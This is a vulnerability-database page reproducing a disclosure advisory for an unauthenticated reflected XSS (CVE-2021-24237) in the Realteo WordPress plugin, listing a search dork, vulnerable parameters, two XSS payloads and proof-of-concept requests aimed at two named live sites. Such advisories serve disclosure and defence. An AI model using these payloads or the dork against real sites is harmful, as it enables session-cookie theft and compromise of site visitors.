Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
2021.04.02
m0ze
(RU)
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2021-24237
CWE:
CWE-79
Dork:
inurl:/wp-content/plugins/realteo/
Ogólna skala CVSS:
4.3/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Brak
/*! - # VULNERABILITY: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS - # GOOGLE DORK: inurl:/wp-content/plugins/realteo/ - # DATE: 2021-03-20 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Purethemes [ https://purethemes.net ] - # SOFTWARE VERSION: <= 1.2.3 - # SOFTWARE LINK: https://themeforest.net/item/findeo-real-estate-wordpress-theme/20697875 - # CVSS: AV:N/AC:L/PR:N/UI:N/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24237 */ ### -- [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Realteo plugin through v1.2.3 for WordPress. [i] Vulnerable parameter(s): ?keyword_search=, ?search_radius=, ?_bedrooms= and ?_bathrooms=. [i] Theme(s) affected: Findeo by Purethemes [ https://purethemes.net ]. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] --!>" autofocus onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//" [$] --!>" autofocus onfocus=alert(document.cookie);//" ### -- [ PoC #1 | Unauthenticated Reflected XSS | Search query: ] [!] https://findeo.realty/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;%20%22%3E [!] GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;%20%22%3E HTTP/1.1 Host: findeo.realty ### -- [ PoC #2 | Unauthenticated Reflected XSS | Search query: ] [!] https://flatkotha.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22 [!] GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22 HTTP/1.1 Host: flatkotha.com ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze
Referencje:
https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
https://twitter.com/vladm0ze
https://www.youtube.com/channel/UCFaIIy9bITw45elW3UXuqrQ/featured
https://github.com/m0ze
See this note in RAW Version
Tweet
Vote for this issue:
1
-2
33%
67%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top
Polish
English